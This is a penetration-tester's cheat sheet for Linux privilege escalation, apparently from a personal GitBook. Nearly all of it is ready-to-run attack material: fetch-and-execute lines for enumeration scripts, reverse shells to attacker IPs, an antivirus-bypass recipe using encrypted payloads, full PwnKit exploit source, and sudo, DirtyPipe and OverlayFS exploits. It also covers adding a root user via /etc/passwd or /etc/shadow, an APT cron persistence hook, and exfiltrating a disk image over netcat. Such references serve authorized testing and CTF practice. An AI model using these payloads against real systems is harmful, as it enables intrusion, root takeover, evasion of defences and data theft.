> For the complete documentation index, see [llms.txt](https://docs.h4rithd.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.h4rithd.com/linux/privilageesc-linux.md). # PrivilageEsc Linux {% hint style="info" %} Check list : {% endhint %} ## [**01. LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) * Remote Network ```bash ## ------------------| Remote download and execrute from Github curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh wget -q -O - https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh ``` * Local Network ```bash ## ------------------| Local Network curl 10.10.10.10/linpeas.sh | sh ## ------------------| Without CURL sudo nc -q 5 -lvnp 80 < linpeas.sh #Host cat < /dev/tcp/10.10.10.10/80 | sh #Victim ## ------------------| Excute from memory and send output back to the host curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim wget -q -O - 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim nc -lvnp 9002 | tee linpeas.out #Host ``` * Output Format ```bash ## ------------------| Output to file ./linpeas.sh -a > /dev/shm/linpeas.txt #Victim less -r /dev/shm/linpeas.txt #Read with colors ``` * AV Bypass ```bash ## ------------------| open-ssl encryption openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim ## ------------------| Base64 encoded base64 -w0 linpeas.sh > lp.enc sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim ``` ## [02. LinEnum](https://github.com/rebootuser/LinEnum) * Remote Network ```bash ## ------------------| Remote download and execrute from Github curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh ``` * Local Network ```bash ./LinEnum.sh -r report.out -t # -t <-- Include thorough (lengthy) tests # -e /dev/shm/ <-- Export all info by separate one by one ``` ## [03. Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2) ```bash ./linux-exploit-suggester-2.pl -k ``` ## [04. Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration) ```bash ./lse.sh -l 2 -i ``` ## [05. PSPY](https://github.com/DominicBreuker/pspy) -Linux process snooping \[unprivileged] * Download * 32 bit big, static version: `pspy32` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32) * 64 bit big, static version: `pspy64` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64) * 32 bit small version: `pspy32s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32s) * 64 bit small version: `pspy64s` [download](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s) ```bash ## ------------------| print both commands and file system events and scan procfs every 1000 ms (=1sec) ./pspy64 -pf -i 1000 ## ------------------| place watchers recursively in two directories and non-recursively into a third ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir ## ------------------| disable printing discovered commands but enable file system events ./pspy64 -p=false -f ``` ## 06. Common exploits ### 06.0 Abusing Shell Features ```bash ## ------------------| If bash < 4.2-048 we can inject to absolute path aswell. /bin/sh --version strace -v -f -e execve /path/to/file 2>&1 | grep exec function /path/to/service { /bin/bash -p; } export -f /path/to/service /path/to/file ## ------------------| If bash < 4.4 (Bash debug ps4) /bin/sh --version env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/vulnbash; chmod +s /tmp/vulnbash)' /path/to/file /tmp/vulnbash -p ``` ### 06.1 Shellshock ``` Date patched : 24 September 2014 Date discovered : 12 September 2014 Affected software : Bash (1.0.3–4.3) ``` ```bash h4rithd='() { :; }; echo sh0ck' bash -c : h4rithd='() { :;}; echo sh0ck' bash -c : # If print sh0ck; does look like vulnerable to shell shok # to verify h4rithd='echo sh0ck' bash -c : # Nothing print # Pik any env variable env LOGNAME='() { :;}; echo sh0ck' sudo /root/troll ## ------------------| With user agent curl -A '() { :; }; echo;echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4545 0>&1' http://127.0.0.1/cgi-bin/stats ### or curl -so shellshock.py https://www.exploit-db.com/raw/34900 python shellshock.py payload=reverse rhost=10.10.14.26 lhost=127.0.0.1 lport=4545 pages=/cgi-bin/stats ``` ### 06.2 LXD ```bash ## ------------------| Find local user account is part of lxd groups. id ## ------------------| clone the repository and build the build-alpine img git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder sudo ./build-alpine ## ------------------| For 32 bit use -a i386 or -a i686 mv alpine-v* alpine.tar.gz ls -al ## ------------------| Start web server python3 -m http.server 80 ## ------------------| Download the file on attacker machine. cd /dev/shm wget 10.10.14.26/alpine.tar.gz ## ------------------| Execute and gain root shell lxc image import ./alpine.tar.gz --alias h4rithd lxc image list lxc init h4rithd ignite -c security.privileged=true ### if above command get error, try lxd init lxc list lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh id cd /mnt/root ``` ### [06.3 logrotate](https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges) ```bash wget https://raw.githubusercontent.com/whotwagner/logrotten/master/logrotten.c gcc -o logrotten logrotten.c echo "bash -i >& /dev/tcp/10.10.14.26/4545 0>&1" > shell.sh chmod +x shell.sh echo "test">>//access.log; ./logrotten /access.log -d cp $(pwd)/shell.sh /etc/bash_completion.d/access.log cat /etc/bash_completion.d/access.log ``` ### 06.4 If you have or can? * If you have **`LD_PRELOAD`** in `env_keep` variable? ```bash ## ------------------| Check if env_keep variable has LD_PRELOAD? sudo -l ## ------------------| Create C code compiled as a share object (.so extension) file #include #include #include void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } ## ------------------| Complie the c code to share object (.so extension) gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles ## ------------------| Execute sudo LD_PRELOAD=/tmp/shell.so ``` * If you have **`LD_LIBRARY_PATH`** in `env_keep` variable? ```bash ## ------------------| Check if env_keep variable has LD_PRELOAD? sudo -l ## ------------------| Create C code compiled as a share object #include #include static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ## ------------------| Complie the c code to share object (.so extension) gcc -o /tmp/library_path.so -shared -fPIC library_path.c ## ------------------| Hijacking shared objects libcrypt.so.1 ## Run ldd against the (sudo -l) programs file to get another mv /tmp/library_path.so /tmp/libcrypt.so.1 ## ------------------| Execute sudo LD_LIBRARY_PATH=/tmp/ ``` * If you have `SETENV` in `sudo -l`? ```bash ## ------------------|Check sudo -l | grep SETENV ## ------------------| Execute sudo PATH=//:$PATH /script.sh ``` * Do we have **`no_root_squash`** in **`/etc/exports`** ```bash ### If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system ## ------------------| Check if no_root_squash is present? cat /etc/exports | grep no_root_squash ## ------------------| List mounts and mount it to our local machine showmount -e sudo mkdir -p /mnt/new sudo mount -t nfs ://mnt/new ### Create a SUID binary and place it. then execuite it via attackers machine. ``` * If you have **write** permission to **`/etc/sudoers`** file? ```bash ### Get current user using whoami command, then enter the following line username ALL=(ALL) NOPASSWD: ALL ### Then run sudo su - ``` * If you have **write** permission to **`/etc/shadow`** file? ```bash ## ------------------| Create password openssl passwd -6 -salt h4rithd h4rithd123 ### -1 --> MD5 ### -5 --> SHA256 ### -6 --> SHA512 ### also you can use it with out salt flag ### Replace the password in /etc/shadow (h4rithd123) $6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0 sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow ## ------------------| one line : h4rithd123 sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow ``` * If you have **write** permission to **`/etc/passwd`** ? ```bash ## ------------------| Create password openssl passwd -1 -salt h4rithd Password123 # ->> $1$h4rithd$wXIyqYpzYefGzryBsTFSU/ ## ------------------| Edit the passwd file echo 'h4rithd:$1$h4rithd$wXIyqYpzYefGzryBsTFSU/:0:0:root:/root:/bin/bash' >> /etc/passwd ## ------------------| Login to the user h4rithd su h4rithd ## Password123 ``` * Can run **`apache2`** as root user? ```bash ## ------------------| Read the shadow file sudo apache2 -f /etc/shadow ## then crack it ``` * If you are in \*\*`video` \*\* group ```bash ## The video group has access to view the screen output. ## Use w command and find is there any tty1 session (physically logged) cat /dev/fb0 > /tmp/screen.raw ## Copy that file to host machine. cat /sys/class/graphics/fb0/virtual_size ## Use this as resolution. ## Open photo using gimp as "RAW image data" and set color mode as RGB565 ``` * If you are in **`docker`** group ```bash ## ------------------| List docker images docker images | awk '{print $1}' | sed '1d' ## ------------------| Use one of image and get root docker run -v /:/mnt --rm -it chroot /mnt sh ``` * If you have **`apt update` on `/etc/crontab`** ```bash ## ------------------| Create pre-invoke script echo '/bin/bash -c "/bin/bash -i >& /dev/tcp//4545 0>&1"' | base64 -w0 echo 'APT::Update::Pre-Invoke {"echo L2Jpbi9 | base64 -d | bash"}' > /etc/apt/apt.conf.d/000shell ``` * If `sudo -l` only for `apt-get update` or `apt-get upgrade`? ```bash ## Watch this video https://youtube.com/watch?v=EXuEDHFjS9E&t=2070 ``` * If you see **`jdwp`** run as privilege user ?? ```bash ## ------------------| First you need to port forword ssh -L 8000:127.0.0.1:8000 user@ip ## ------------------| Using jdwp-shellifier [Best Methord] git clone https://github.com/IOActive/jdwp-shellifier cd jdwp-shellifier ### Create reverse shell on /tmp/shell.sh (Victem's machine) python2 jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh" ## ------------------| Attached remote port [Connection is not persistence] jdb -attach 8000 > classpath ### List class path > classes ### List classes > threads ### List all threads > stop in java.lang.String.indexOf(int) ### Set brakepoint print new java.lang.Runtime().exec("/bin/touch /tmp/hello.txt") ``` * If you are in **`disk` group** ? ```bash ## ------------------| Check if you are in disk group. groups | grep -oP disk ## ------------------| Check if you have R/W permission on sds. ls -la /dev/sd* ## ------------------| Check which one belongs to me. mount | grep '^\/dev' ## ------------------| Try to read it strings /dev/sda1 | grep root.txt debugfs /dev/sda1 ## then use ls commands. ## ------------------| If you do not have access; Check if it link to any other ls -al /dev/mapper/Kotarak--vg-root ##Suppose I get an "/dev/dm-0" in response. ## ------------------| Send file using netcat nc -lvnp 8002 > disk.img.gz ## on attacker's machine dd if=/dev/dm-0 | gzip -1 - | nc 8002 ## ------------------| Mout the image file to our machine gunzip disk.img.gz mount disk.img /mnt ``` * [Can run `fail2ban` with root prv](https://systemweakness.com/privilege-escalation-with-fail2ban-nopasswd-d3a6ee69db49)? ```bash ## ------------------| Check which file we have write permission on find /etc -writable -ls 2>/dev/null ls -al /etc/fail2ban/action.d/ ## ------------------| Expolit ### Replace "actionban = shell" on /etc/fail2ban/action.d/iptables-multiport.conf sed 's/actionban =.*/actionban = chmod u+s \/bin\/bash/g' /etc/fail2ban/action.d/iptables-multiport.conf > config.conf rm -f /etc/fail2ban/action.d/iptables-multiport.conf mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf sudo /etc/init.d/fail2ban restart hydra ssh -l root -P /usr/share/wordlists/rockyou.txt ls -l /bin/bash bash -p ``` * Can you run gdb (debug)? ```bash ## ------------------| Find process which run under root prv ps -aux | grep root | grep "python" ## ------------------| Attach the gdb instance to that specific process ID gdb -p ## ------------------| Hook/Call the process call (void)system("chmod u+s /bin/bash") quite bash -p ``` * If you can read `.Xauthority` file?

## ------------------| Check if it contain MIT-magic-cookie-1
xxd .Xauthority 

## ------------------| Check what display is currently connected (:0)
w

## ------------------| Verify Cookie
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0

## ------------------| Take Screenshot
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/capture.xwd

## ------------------| Convert
sudo apt install imagemagick -y
convert capture.xwd capture.png

* If you can run `dstat` tool as sudo ```bash ## ------------------| Find configuration settings find / -type d -name dstat 2>/dev/null ## ------------------| Assume the location is "/usr/local/share/dstat" echo "import os;os.system('sudo chmod +s /usr/bin/bash')" > /usr/local/share/dstat/dstat_h4rithd.py dstat --list | grep h4rithd sudo -u root /usr/bin/dstat --h4rithd bash -p ``` * If we can run any `doas` ```bash ## ------------------| Find configuration settings find / -type f -name doas.conf 2>/dev/null ## ------------------| run as another user doas -u root /usr/bin/bash ``` ### 06.5 SUDO Vulnerability * [CVE-2019-14287](https://www.exploit-db.com/exploits/47502) ```bash ## Sudo 1.8.27 - Security Bypass (CVE: 2019-14287) sudo -u#-1 /bin/bash ``` * [CVE-2021-3156](https://github.com/worawit/CVE-2021-3156) ```bash ## Sudo Baron Samedit Exploit | CVE-2021-3156 ## versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1 are affected. sudoedit -s '\' `perl -e 'print "A" x 65536'` ## If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable ``` * [CVE-2023-22809](https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc) ```bash ## ------------------| Affected sudo versions: 1.8.0 to 1.9.12p1 sudo -V ## ------------------| Exploit export EDITOR="vim -- /etc/passwd" sudoedit /etc/motd ### change any user group to 0 ``` * [CVE‑2025‑32463](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot/tree/main) ```bash ## ------------------| Affected sudo versions: v1.9.14 to 1.9.17 wget https://raw.githubusercontent.com/pr0v3rbs/CVE-2025-32463_chwoot/refs/heads/main/sudo-chwoot.sh chmod +x sudo-chwoot.sh ./sudo-chwoot.sh ``` ### 06.6 Ansible ```bash ## ------------------| Reverse Shell - hosts: localhost tasks: - name: rev shell: bash -c 'bash -i >& /dev/tcp//4545 0>&1' ``` ### 06.7 PwnKit \[[CVE-2021-4034](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)] ```bash ## ------------------| Affected versions: 0.95 through 0.118 pkexec --version ## ------------------| Expolit #include #include #include char *shell = "#include \n" "#include \n" "#include \n\n" "void gconv() {}\n" "void gconv_init() {\n" " setuid(0); setgid(0);\n" " seteuid(0); setegid(0);\n" " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n" " exit(0);\n" "}"; int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"); system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; execve("/usr/bin/pkexec", (char*[]){NULL}, env); } ### gcc -o exploit exploit.c ``` ### 06.8 OverlayFS 2021 \[[CVE-2021-3493](https://github.com/briskets/CVE-2021-3493)]

## ------------------| Affected Versions,
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

## ------------------| Expolit
ssh
## Or you can download it from here: https://github.com/h4rithd/PrecompiledBinaries/tree/main/CVE-2021-3493
gcc exploit.c -o exploit
./exploit

### 06.9 DirtyPipe \[[CVE-2022-0847](https://dirtypipe.cm4all.com)] ```bash ## ------------------| Abstract ## Vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files ## The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102. ## Precompiled --> https://github.com/h4rithd/PrecompiledBinaries/tree/main/DirtyPipe ## ------------------| Add root user wget https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c gcc -o dpipe exploit.c ./dpipe su root # password : aaron ## ------------------| Change SUID binary wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c gcc -o dpipe exploit-2.c ## find SUID Binary find / -perm -4000 -ls 2>/dev/null ## Execute it as /usr/bin/pkexec ./dpipe /usr/bin/pkexec ``` ### 06.10 Enlightenment \[CVE-2022-37706] ```bash ## ------------------| Expo file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Enjoy the root shell :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net ``` ### 06.11 OverlayFS 2023 \[[CVE-2023-0386](https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/#how-the-cve-2023-0386-vulnerability-works)] ```bash ## ------------------| Affected Versions, if kernel version is lower than 6.2 uname -r ## ------------------| Expolits git clone https://github.com/xkaneiki/CVE-2023-0386.git ## or you can download precompiled binary from here: https://github.com/h4rithd/PrecompiledBinaries/edit/main/CVE-2023-0386 sudo apt-get install libfuse-dev libcap-dev cd CVE-2023-0386 make all ### Start two terminals and enter in the first terminal ./fuse ./ovlcap/lower ./gc ### In the second terminal enter ./exp ``` ### 06.12 GameOver(lay) \[[CVE-2023-2640 & CVE-2023-32629](https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/)] ```bash ## ------------------| My one unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash -i\")'" ## ------------------| Original poc payload unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' ## ------------------| Adjusted poc payload by twitter user; likely false positive unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'" ``` ### 06.13 Other ```elixir ## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /dev/shm/rootkey true ``` ## 07. Kernel Privesc 1. [**Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation**](https://www.exploit-db.com/exploits/44298) 2. [**Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)**](https://www.exploit-db.com/exploits/37292)\*\*\*\* *** --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/linux/privilageesc-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.